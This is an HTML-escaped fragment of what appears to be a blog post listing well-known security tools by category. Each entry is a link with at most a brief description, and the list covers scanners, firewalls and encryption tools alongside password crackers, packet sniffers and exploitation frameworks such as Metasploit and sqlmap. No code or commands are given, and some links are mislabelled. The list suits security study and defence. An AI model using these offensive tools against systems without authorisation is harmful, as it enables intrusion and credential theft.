&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: EN-IN;&quot;&gt;
    &lt;br /&gt;
    1.&amp;nbsp;&lt;a href=&quot;http://www.aircrack-ng.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Aircrack-ng&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    2.&amp;nbsp;&lt;a href=&quot;http://efytimes.com/e1/www.kismetwireless.net&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Kismet&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    3.&amp;nbsp;&lt;a href=&quot;http://www.metageek.net/products/inssider/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;inSSIDer&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    4.&amp;nbsp;&lt;a href=&quot;http://kismac-ng.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;KisMAC&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    &lt;b&gt;Intrusion Detection Systems:&lt;/b&gt;&amp;nbsp;Intrusion detection tools are one
    of the most important part of any security arrangement. They allow you to
    detect those threats that are potentially dangerous for your system.&lt;br /&gt;
    &lt;br /&gt;
    1.&amp;nbsp;&lt;a href=&quot;http://efytimes.com/e1/www.snort.org&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Snort&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    2.&amp;nbsp;&lt;a href=&quot;http://sourceforge.net/projects/netcop/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;NetCop&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    &lt;b&gt;Port Scanners&lt;/b&gt;&lt;br /&gt;
    &lt;br /&gt;
    1.&amp;nbsp;&lt;a href=&quot;http://nmap.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Nmap&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    2.&amp;nbsp;&lt;a href=&quot;http://www.softpedia.com/get/Network-Tools/Network-IP-Scanner/SuperScan.shtml&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Superscan&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    3.&amp;nbsp;&lt;a href=&quot;http://angryip.org/w/Download&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Angry IP
    Scanner&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    &lt;b&gt;Encryption Tools:&lt;/b&gt;&amp;nbsp;In an age where more and more governments are
    being found spying on their own citizens, encryption is the word of the
    day. These tools allow you to encrypt your data so that even if someone
    does get through, they can’t get to the data easily.&lt;br /&gt;
    &lt;br /&gt;
    1.&amp;nbsp;&lt;a href=&quot;http://www.truecrypt.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;TrueCrypt&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    2.&amp;nbsp;&lt;a href=&quot;http://www.openssh.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;OpenSSH&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    3.&amp;nbsp;&lt;a href=&quot;http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Putty&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    4.&amp;nbsp;&lt;a href=&quot;http://www.openssl.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;OpenSSL&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    5.&amp;nbsp;&lt;a href=&quot;http://www.torproject.org.in/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Tor&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    6.&amp;nbsp;&lt;a href=&quot;http://openvpn.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;OpenVPN&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    7.&amp;nbsp;&lt;a href=&quot;https://www.stunnel.org/index.html&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Stunnel&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    8.&amp;nbsp;&lt;a href=&quot;http://keepass.info/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;KeePass&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    &lt;b&gt;Password Crackers:&lt;/b&gt;&amp;nbsp;The name is pretty self explanatory in this
    case. These tools help you recover passwords from the data that a computer
    system is storing or transmitting over a network.&lt;br /&gt;
    &lt;br /&gt;
    1.&amp;nbsp;&lt;a href=&quot;http://ophcrack.sourceforge.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Ophcrack&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    2.&amp;nbsp;&lt;a href=&quot;http://foofus.net/goons/jmk/medusa/medusa.html&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Medusa&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    3.&amp;nbsp;&lt;a href=&quot;http://project-rainbowcrack.com/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;RainbowCrack&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    4.&amp;nbsp;&lt;a href=&quot;http://www.edge-security.com/wfuzz.php&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Wfuzz&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    5.&amp;nbsp;&lt;a href=&quot;http://www.hoobie.net/brutus/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Brutus&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    6.&amp;nbsp;&lt;a href=&quot;http://www.l0phtcrack.com/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;L0phtCrack&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    7.&amp;nbsp;&lt;a href=&quot;http://foofus.net/goons/fizzgig/fgdump/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;fgdump&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    8.&amp;nbsp;&lt;a href=&quot;https://www.thc.org/thc-hydra/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;THC Hydra&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    9.&amp;nbsp;&lt;a href=&quot;http://www.openwall.com/john/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;John The
    Ripper&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    10.&amp;nbsp;&lt;a href=&quot;http://www.aircrack-ng.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Aircrack&lt;/span&gt;&lt;/a&gt;&amp;nbsp;-
    Aircrack is 802.11 WEP and WPA-PSK keys cracking program.&lt;br /&gt;
    &lt;br /&gt;
    11.&amp;nbsp;&lt;a href=&quot;http://www.oxid.it/cain.html&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Cain and
    Abel&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    &lt;b&gt;Packet Crafting:&lt;/b&gt;&amp;nbsp;Packet crafting is the technique through which
    an attacker finds vulnerabilities or entry points within your firewall.
    These tools help you achieve that more easily.&lt;br /&gt;
    &lt;br /&gt;
    1.&amp;nbsp;&lt;a href=&quot;http://www.hping.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Hping&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    2.&amp;nbsp;&lt;a href=&quot;http://www.secdev.org/projects/scapy/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Scapy&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    3.&amp;nbsp;&lt;a href=&quot;http://nc110.sourceforge.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Netcat&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    4.&amp;nbsp;&lt;a href=&quot;http://www.yersinia.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Yersinia&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    5.&amp;nbsp;&lt;a href=&quot;http://nemesis.sourceforge.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Nemesis&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    6.&amp;nbsp;&lt;a href=&quot;http://www.dest-unreach.org/socat/doc/socat.html&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Socat&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    &lt;b&gt;Traffic Monitoring:&lt;/b&gt;&amp;nbsp;These are tools that let you monitor what
    websites your employees or children are monitoring.&lt;br /&gt;
    &lt;br /&gt;
    1.&amp;nbsp;&lt;a href=&quot;http://www.splunk.com/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Splunk&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    2.&amp;nbsp;&lt;a href=&quot;http://www.nagios.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Nagios&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    3.&amp;nbsp;&lt;a href=&quot;http://www.pof.com/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;P0f&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    4.&amp;nbsp;&lt;a href=&quot;http://ngrep.sourceforge.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Ngrep&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    &lt;b&gt;Packet Sniffers:&lt;/b&gt;&amp;nbsp;These are tools that can allow you to capture
    and visualise the traffic that is coming on your website.&lt;br /&gt;
    &lt;br /&gt;
    1.&amp;nbsp;&lt;a href=&quot;http://www.wireshark.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Wireshark&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    2.&amp;nbsp;&lt;a href=&quot;http://www.tcpdump.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Tcpdump&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    3.&amp;nbsp;&lt;a href=&quot;http://ettercap.github.io/ettercap/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Ettercap&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    4.&amp;nbsp;&lt;a href=&quot;http://www.monkey.org/~dugsong/dsniff/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;dsniff&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    5.&amp;nbsp;&lt;a href=&quot;http://etherape.sourceforge.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;EtherApe&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    &lt;b&gt;Vulnerability Exploitation:&lt;/b&gt;&amp;nbsp;These are the tools that you would
    use in order to gain access to various places.&lt;br /&gt;
    &lt;br /&gt;
    1.&amp;nbsp;&lt;a href=&quot;http://www.metasploit.com/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Metasploit&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    2.&amp;nbsp;&lt;a href=&quot;http://sqlmap.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;sqlmap&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    3.&amp;nbsp;&lt;a href=&quot;http://sqlninja.sourceforge.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;sqlninja&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    4.&amp;nbsp;&lt;a href=&quot;https://www.trustedsec.com/downloads/social-engineer-toolkit/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Social Engineer Toolkit&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    5.&amp;nbsp;&lt;a href=&quot;https://www.mavitunasecurity.com/netsparker/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;NetSparker&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    6.&amp;nbsp;&lt;a href=&quot;http://beefproject.com/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;BeEF&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
    &lt;br /&gt;
    7.&amp;nbsp;&lt;a href=&quot;http://dradisframework.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Dradis&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
   &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;span style=&quot;background: white; font-family: &#39;Open Sans&#39;, sans-serif;&quot;&gt;Vulnerability Scanners:&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&lt;span style=&quot;background: white; font-family: &#39;Open Sans&#39;, sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background: white; font-family: &#39;Open Sans&#39;, sans-serif;&quot;&gt;These
are programs that have been designed to asses a computer or network’s
vulnerability to attacks. The functionality of these tools varies from one to
the other, but they all present a detailed analysis of how vulnerable your system
is.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &#39;Open Sans&#39;, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;1.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;,&amp;quot;sans-serif&amp;quot;;&quot;&gt;&lt;a href=&quot;http://www.tenable.com/products/nessus&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Nessus&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;2.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.openvas.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;OpenVAS&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;3.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/nipper/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Nipper&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;4.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://secunia.com/products/consumer/psi/sys_req/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Secunia PSI&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;5.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.beyondtrust.com/Products/RetinaNetworkSecurityScanner/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Retina&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;6.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.qualys.com/enterprises/qualysguard/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;QualysGuard&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;7.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.rapid7.com/products/nexpose/compare-downloads.jsp&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Nexpose&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;background: white;&quot;&gt;Web Vulnerability Scanners:&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&lt;span style=&quot;background: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background: white;&quot;&gt;While
vulnerability scanners are meant for your system, web vulnerability scanners
assess the vulnerability of web applications. The identify the security
vulnerabilities that your app may have through various tests.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;1.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.portswigger.net/burp/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Burp
Suite&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;2.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;WebScarab&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;3.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.websecurify.com/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Websecurify&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;4.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.cirt.net/nikto2&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Nikto&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;5.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://w3af.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;w3af&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;background: white;&quot;&gt;Web Proxies:&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&lt;span style=&quot;background: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background: white;&quot;&gt;Proxies
were originally created in order to add encapsulation to distributed systems.
The client contacts a proxy server in order to request an item that exists on
your server.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;1.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/paros/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Paros&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;2.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/paros/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Fiddler&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;3.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;https://code.google.com/p/ratproxy/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Ratproxy&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;4.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.thoughtcrime.org/software/sslstrip/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;sslstrip&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;background: white;&quot;&gt;Rootkit Detectors:&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&lt;span style=&quot;background: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background: white;&quot;&gt;This
tool is a file and directory integrity checker. It verifies if a file is
trustworthy and informs the user if found otherwise.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;1.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://aide.sourceforge.net/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;AIDE
(Advanced Intrusion Detection Environment)&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;background: white;&quot;&gt;Firewalls:&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&lt;span style=&quot;background: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background: white;&quot;&gt;You
obviously know what a Firewall is. These monitor and control the traffic in
your network, whether incoming or outgoing. They are essential security tools
that are used by the most novice to the most advanced users.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;1.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.netfilter.org/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;Netfilter&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;2.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.openbsdindia.org/faq/pf/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;PF:
OpenBSD Packet Filter&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;background: white;&quot;&gt;Fuzzers:&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&lt;span style=&quot;background: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background: white;&quot;&gt;The
concept of fuzzing is usually put to use in order to test the security
vulnerabilities of computer systems or in the software that runs on them.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background: white;&quot;&gt;1.&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;https://code.google.com/p/skipfish/&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background: white; color: #008eb0; text-decoration: none; text-underline: none;&quot;&gt;skipfish&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
